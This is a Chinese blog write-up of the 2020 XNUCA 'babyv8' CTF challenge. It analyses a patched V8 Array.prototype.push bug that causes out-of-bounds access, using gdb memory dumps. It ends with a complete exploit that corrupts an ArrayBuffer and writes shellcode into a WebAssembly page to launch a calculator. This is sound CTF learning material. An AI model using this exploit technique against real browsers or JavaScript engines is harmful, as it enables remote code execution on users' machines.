2020-XNUCA-babyv8

字数统计: 2.1k字   |   阅读时长≈ 11分

先把几道比较简单的OOB类型的题目做了,希望能增加对V8有一点点点的了解

漏洞环境

1
2
3
4
5
git checkout 8.6.358
git apply < patch
gclient sync
tools/dev/v8gen.py x64.release
ninja -C out.gn/x64.release d8

漏洞分析

1
2
3
4
5
6
7
8
9
10
11
12
13
diff --git a/src/codegen/code-stub-assembler.cc b/src/codegen/code-stub-assembler.cc
index 16fd384..8bf435a 100644
--- a/src/codegen/code-stub-assembler.cc
+++ b/src/codegen/code-stub-assembler.cc
@@ -2888,7 +2888,7 @@ TNode<Smi> CodeStubAssembler::BuildAppendJSArray(ElementsKind kind,
       [&](TNode<Object> arg) {
         TryStoreArrayElement(kind, &pre_bailout, elements, var_length.value(),
                              arg);
-        Increment(&var_length);
+        Increment(&var_length, 3);
       },
       first);
   {

patch文件如上所示,主要修改了BuildAppendJSArray函数,这里将原本的Increment(&var_length)函数修改为了Increment(&var_length, 3)

查找该函数的上层调用,发现其在TF_BUILTIN(ArrayPrototypePush, CodeStubAssembler)函数里被调用,而TF_BUILTIN(ArrayPrototypePush, CodeStubAssembler)函数是js中的Array.prototype.push函数的具体实现,因此该漏洞与push操作有关。

看一下完整函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
// Resize the capacity of the fixed array if it doesn't fit.
  TNode<IntPtrT> first = arg_index->value();
  Node* growth = IntPtrToParameter(
      IntPtrSub(UncheckedCast<IntPtrT>(args->GetLength(INTPTR_PARAMETERS)),
                first),
      mode);
  PossiblyGrowElementsCapacity(mode, kind, array, var_length.value(),
                               &var_elements, growth, &pre_bailout);

  // Push each argument onto the end of the array now that there is enough
  // capacity.
  CodeStubAssembler::VariableList push_vars({&var_length}, zone());
  Node* elements = var_elements.value();
  args->ForEach(
      push_vars,
      [this, kind, mode, elements, &var_length, &pre_bailout](Node* arg) {
        TryStoreArrayElement(kind, mode, &pre_bailout, elements,
                             var_length.value(), arg);
        Increment(&var_length, 3, mode);
      },
      first, nullptr);
  {
    TNode<Smi> length = ParameterToTagged(var_length.value(), mode);
    var_tagged_length = length;
    StoreObjectFieldNoWriteBarrier(array, JSArray::kLengthOffset, length);
    Goto(&success);
  }

其中看到,在存储数据之前,先进行了扩容,但这个扩容的计算是根据元素的个数来算的,而patch后,原本每次push一个数据,末尾指针加1,现在加了3。

最后,数据都push完成后,将var_length的值作为Arraylength,这就导致了数组的length大于其本身elements的大小,导致了oob。

漏洞利用

测试代码

1
2
3
4
5
var arr = [];
arr[0] = 1.1;
arr.push(1.1,2.2,3.3,4.4,5.5,6.6);
%DebugPrint(arr);
%SystemBreak();

我们使用如上代码,来测试是否会触发漏洞:

1
2
3
4
5
6
Starting program: /home/alex/v8/traning/xnuca/babyV8/d8 --allow-natives-syntax ./test.js
                                                                                        
[Thread debugging using libthread_db enabled]                                           
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".              
[New Thread 0x7f5c83ed3700 (LWP 2669)]                                                  
0x23bb08088179 <JSArray[19]>

可以看到arr的长度变为了19,接着我们看一下此时的arr的内存布局:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
gdb-peda$ x/30xg 0x23bb08088178                            
0x23bb08088178: 0x080426e508243905      0x0000002608088189  //element的低4位地址
0x23bb08088188: 0x0000002208042a39      0x3ff199999999999a 
0x23bb08088198: 0x3ff199999999999a      0xfff7fffffff7ffff 
0x23bb080881a8: 0xfff7fffffff7ffff      0x400199999999999a 
0x23bb080881b8: 0xfff7fffffff7ffff      0xfff7fffffff7ffff 
0x23bb080881c8: 0x400a666666666666      0xfff7fffffff7ffff 
0x23bb080881d8: 0xfff7fffffff7ffff      0x401199999999999a 
0x23bb080881e8: 0xfff7fffffff7ffff      0xfff7fffffff7ffff 
0x23bb080881f8: 0x4016000000000000      0xfff7fffffff7ffff 
0x23bb08088208: 0xfff7fffffff7ffff      0x401a666666666666 
0x23bb08088218: 0x0000000000000000      0x0000000000000000 
0x23bb08088228: 0x0000000000000000      0x0000000000000000 
0x23bb08088238: 0x0000000000000000      0x0000000000000000 
0x23bb08088248: 0x0000000000000000      0x0000000000000000 
0x23bb08088258: 0x0000000000000000      0x0000000000000000 
gdb-peda$ p {double}0x23bb08088198                         
$6 = 1.1000000000000001                                    
gdb-peda$ p {double}0x23bb080881b0                         
$7 = 2.2000000000000002                                    
gdb-peda$ p {double}0x23bb080881c8                         
$8 = 3.2999999999999998                                    
gdb-peda$ p {double}0x23bb080881e0                         
$9 = 4.4000000000000004                                    
gdb-peda$ p {double}0x23bb080881f8                         
$10 = 5.5                                                  
gdb-peda$ p {double}0x23bb08088210                         
$11 = 6.5999999999999996

从上面可以看到arr的内存布局是 ``0x23bb08088180的低4位地址存储的是elements元素的低4位地址,因为这个版本的v8开启了指针压缩,所以这里每个指针如果高4位地址相同,那么就只存储低4位地址。但是这里我们已经看到array的长度已经变为了19`,是可以越界的。

那么可以考虑直接在一个arr对象下面,继续布置第二个array数组对象arr2,通过第一个arr对象的越界来修改arr2对象的属性。例如将arr2的长度改大,从而使得arr2能够越界更多。实现前面例如issue 1793或者2021数字经济两道题目的做法。

测试代码如下:

1
2
3
4
5
6
7
var arr = [];
arr[0] = 1.1;
arr.push(1.1,2.2,3.3,4.4,5.5,6.6);
var arr2 = [1.1, 2.2];
%DebugPrint(arr);
%DebugPrint(arr2);
%SystemBreak();

我们查看内存布局如下,这里经过测试,发现无法直接溢出修改arr2length,其位于0xc2108088284,而我们越界溢出只能修改0xc2108088260

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
0x20c70808819d <JSArray[19]>   
0x20c708088259 <JSArray[2]>    

//arr1
pwndbg> tel 0x20c70808819c                              
00:00000x20c70808819c ◂— 0x80426e508243905           
01:00080x20c7080881a4 ◂— 0x26080881b1           	//arr1->elements     
02:00100x20c7080881ac ◂— 0x8042a3908042219           
03:00180x20c7080881b4 ◂— 0x9999999a00000022 /* '"' */
04:00200x20c7080881bc ◂— 0x9999999a3ff19999          
05:00280x20c7080881c4 ◂— 0xfff7ffff3ff19999          
06:00300x20c7080881cc ◂— 0xfff7fffffff7ffff          
07:00380x20c7080881d4 ◂— 0x9999999afff7ffff          
//arr2
pwndbg> tel 0x20c708088258                       
00:00000x20c708088258 ◂— 0x80426e508243905    
01:00080x20c708088260 ◂— 0x408088241      			//arr2->elements    
02:00100x20c708088268 ◂— 0x0                  

//arr1->elements
pwndbg> tel 0x20c7080881b0                        
00:00000x20c7080881b0 ◂— 0x2208042a39          
01:00080x20c7080881b8 ◂— 0x3ff199999999999a    //arr1[0]
02:00100x20c7080881c0 ◂— 0x3ff199999999999a    
03:00180x20c7080881c8 ◂— 0xfff7fffffff7ffff    
04:00200x20c7080881d0 ◂— 0xfff7fffffff7ffff    
05:00280x20c7080881d8 ◂— 0x400199999999999a    
06:00300x20c7080881e0 ◂— 0xfff7fffffff7ffff    
07:00380x20c7080881e8 ◂— 0xfff7fffffff7ffff    
//arr2->elements
pwndbg> tel 0x20c708088240                       
00:00000x20c708088240 ◂— 0x408042a39          
01:00080x20c708088248 ◂— 0x3ff199999999999a   //arr2[0]
02:00100x20c708088250 ◂— 0x400199999999999a   
03:00180x20c708088258 ◂— 0x80426e508243905    
04:00200x20c708088260 ◂— 0x408088241          
05:00280x20c708088268 ◂— 0x0                  

//arr1 oob可覆盖的范围
pwndbg> p/x 0x20c7080881b8+19*0x8               
$14 = 0x20c708088250

从上面的内存布局可以看出,如果直接想用arr1oob去覆盖arr2->length是覆盖不到的,因为arr2->length0x20c708088264地址处,而arr1能够覆盖的地址为0x20c708088250。这里的原因是由于array对象的elements是在array object的上面,如果让elements地址在对象的下面,那么就有可能覆盖length.

这里通过var arr2 = new Array(1.1,2.2);产生的对象的内存布局是什么。测试代码如下:

1
2
3
4
5
6
7
var arr = [];
arr[0] = 1.1;
arr.push(1.1,2.2,3.3,4.4,5.5,6.6);
var arr2 = new Array(1.1,2.2);
%DebugPrint(arr);
%DebugPrint(arr2);
%SystemBreak();

内存布局如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
0x2831080881a5 <JSArray[19]>            
0x283108088249 <JSArray[2]>             

//arr1
pwndbg> tel 0x2831080881a4                               
00:00000x2831080881a4 ◂— 0x80426e508243905            
01:00080x2831080881ac ◂— 0x26080881b9           	//arr1->elements      
02:00100x2831080881b4 ◂— 0x8042a3908042219            
03:00180x2831080881bc ◂— 0x9999999a00000022 /* '"' */ 
04:00200x2831080881c4 ◂— 0x9999999a3ff19999           
05:00280x2831080881cc ◂— 0xfff7ffff3ff19999           
06:00300x2831080881d4 ◂— 0xfff7fffffff7ffff           
07:00380x2831080881dc ◂— 0x9999999afff7ffff           
//arr2
pwndbg> tel 0x283108088248                            
00:00000x283108088248 ◂— 0x80426e508243905         
01:00080x283108088250 ◂— 0x408088259           	//arr2->elements    
02:00100x283108088258 ◂— 0x408042a39               
03:00180x283108088260 ◂— 0x3ff199999999999a        
04:00200x283108088268 ◂— 0x400199999999999a        
05:00280x283108088270 ◂— 0x0                       

//arr1->elements
pwndbg> tel 0x2831080881b8                          
00:00000x2831080881b8 ◂— 0x2208042a39            
01:00080x2831080881c0 ◂— 0x3ff199999999999a    //arr1[0]  
02:00100x2831080881c8 ◂— 0x3ff199999999999a      
03:00180x2831080881d0 ◂— 0xfff7fffffff7ffff      
04:00200x2831080881d8 ◂— 0xfff7fffffff7ffff      
05:00280x2831080881e0 ◂— 0x400199999999999a      
06:00300x2831080881e8 ◂— 0xfff7fffffff7ffff      
07:00380x2831080881f0 ◂— 0xfff7fffffff7ffff      
//arr2->elements
pwndbg> tel 0x283108088258                     
00:00000x283108088258 ◂— 0x408042a39        
01:00080x283108088260 ◂— 0x3ff199999999999a   //arr2[0]
02:00100x283108088268 ◂— 0x400199999999999a 
03:00180x283108088270 ◂— 0x0                
... ↓     4 skipped    

//arr1 oob可覆盖的范围
pwndbg> p/x 0x2831080881c0+19*8                
$15 = 0x283108088258

可以看到new Array产生的对象的element布局与数组对象布局不同,其elements是位于对象的下面,所以这时候我们的arr1是能够覆盖到arr2->length地址0x283108088254的。那么这里就可以将arr2length改得更大。

此时,就能够修改arr2的对象结构。由于这个版本的V8开启了compression pointer,所以我们不能直接去修改arr2的指针。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
var buf = new ArrayBuffer(0x8);
var dv = new DataView(buf);

//将一个32位整数打包位64位浮点数
function p64(val) {
   dv.setUint32(0,val & 0xFFFFFFFF,true);
   dv.setUint32(0x4,val >> 32,true);
   var float_val = dv.getFloat64(0,true);
   return float_val;
}

//将两个32位整数打包为一个64位浮点数
function p64(low4,high4) {
   dv.setUint32(0,low4,true);
   dv.setUint32(0x4,high4,true);
   var float_val = dv.getFloat64(0,true);
   return float_val;
}

//解包64位浮点数的低四字节
function u64_l(val) {
   dv.setFloat64(0,val,true);
   return dv.getUint32(0,true);
}

//解包64位浮点数的高四字节
function u64_h(val) {
   dv.setFloat64(0,val,true);
   return dv.getUint32(0x4,true);
}

var obj = {};
%DebugPrint(obj);
var arr = [];
arr[0] = 1.1;
arr.push(1.1,2.2,3.3,4.4,5.5,6.6);
%DebugPrint(arr);
console.log("arr oob");
var oob_arr = new Array(1.1,2.2);
var obj_arr = [obj,obj]
console.log("oob_arr obj");
%DebugPrint(oob_arr);
var arb_buf = new ArrayBuffer(0x10);
var d = arr[17];
var double_element_map = u64_l(d);
console.log(d);
var tmp0 = u64_h(d);
d = arr[18];
var tmp1 = u64_l(d);
print("double_element_map="+double_element_map.toString(16));
//%SystemBreak();
arr[18] = p64(tmp1,0x100000); //修改oob_arr的length
//%SystemBreak();
d = oob_arr[4];
var obj_element_map = u64_l(d);
print("obj_element_map=" + obj_element_map.toString(16));
//%SystemBreak();

/*function addressOf(m_obj) {
   obj_arr[0] = m_obj;
   oob_arr[0x4] = p64(double_element_map,tmp0);
   var a = u64_l(obj_arr[0]) - 0x1;
   oob_arr[0x4] = p64(obj_element_map,tmp0);
   return a;
}

function fakeObject(addr) {
   oob_arr[0] = p64(addr + 0x1);
   arr[17] = p64(obj_element_map,tmp0);
   var a = oob_arr[0];
   arr[17] = p64(double_element_map,tmp0);
   return a;
}*/

const wasmCode = new Uint8Array([0x00,0x61,0x73,0x6D,0x01,0x00,0x00,0x00,0x01,0x85,0x80,0x80,0x80,0x00,0x01,0x60,0x00,0x01,0x7F,0x03,0x82,0x80,0x80,0x80,0x00,0x01,0x00,0x04,0x84,0x80,0x80,0x80,0x00,0x01,0x70,0x00,0x00,0x05,0x83,0x80,0x80,0x80,0x00,0x01,0x00,0x01,0x06,0x81,0x80,0x80,0x80,0x00,0x00,0x07,0x91,0x80,0x80,0x80,0x00,0x02,0x06,0x6D,0x65,0x6D,0x6F,0x72,0x79,0x02,0x00,0x04,0x6D,0x61,0x69,0x6E,0x00,0x00,0x0A,0x8A,0x80,0x80,0x80,0x00,0x01,0x84,0x80,0x80,0x80,0x00,0x00,0x41,0x2A,0x0B]);
const shellcode = new Uint8Array([0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x68,0x2d,0x63,0x00,0x00,0x48,0x89,0xe6,0x52,0xe8,0x1c,0x00,0x00,0x00,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x3a,0x30,0x20,0x67,0x6e,0x6f,0x6d,0x65,0x2d,0x63,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72,0x00,0x56,0x57,0x48,0x89,0xe6,0x0f,0x05]);

var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var func = wasmInstance.exports.main;

var wasm_shellcode_addr_l;
var wasm_shellcode_addr_h;

print('search begin...');
//%SystemBreak();
//搜索wasm_shellcode_addr
for (var i=0xfe;i>=1;i-=1) {
   d = oob_arr[0x31200+i];
   wasm_shellcode_addr_l = u64_h(d);
   d = oob_arr[0x31200+i+1];
   wasm_shellcode_addr_h = u64_l(d);
   if (parseInt(wasm_shellcode_addr_h) != 0 && parseInt(wasm_shellcode_addr_l) != 0 && parseInt(wasm_shellcode_addr_l & 0xFFF) == 0) {
      print("wasm_shellcode_addr=" + wasm_shellcode_addr_h.toString(16) + wasm_shellcode_addr_l.toString(16));
      break;
   }
}

//%SystemBreak();
if(parseInt(wasm_shellcode_addr_h) == 0){
   print("Not Found");
}

oob_arr[0x7] = p64(tmp0,0x1000); //修改ArrayBuffer的length
oob_arr[0x8] = p64(0,wasm_shellcode_addr_l); //backing_stroe
oob_arr[0x9] = p64(wasm_shellcode_addr_h,0);
oob_arr[0xa] = p64(0x2,0);


var adv = new DataView(arb_buf);
//替换wasm的shellcode
for (var i=0;i<shellcode.length;i++) {
   adv.setUint32(i,shellcode[i], true);
}
//%SystemBreak();
//执行shellcode
func();

参考

只要你支持她,我们就是好朋友2333

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要研究:
二进制安全、漏洞挖掘
CTF菜鸡一只

天枢Dubhe 学习ing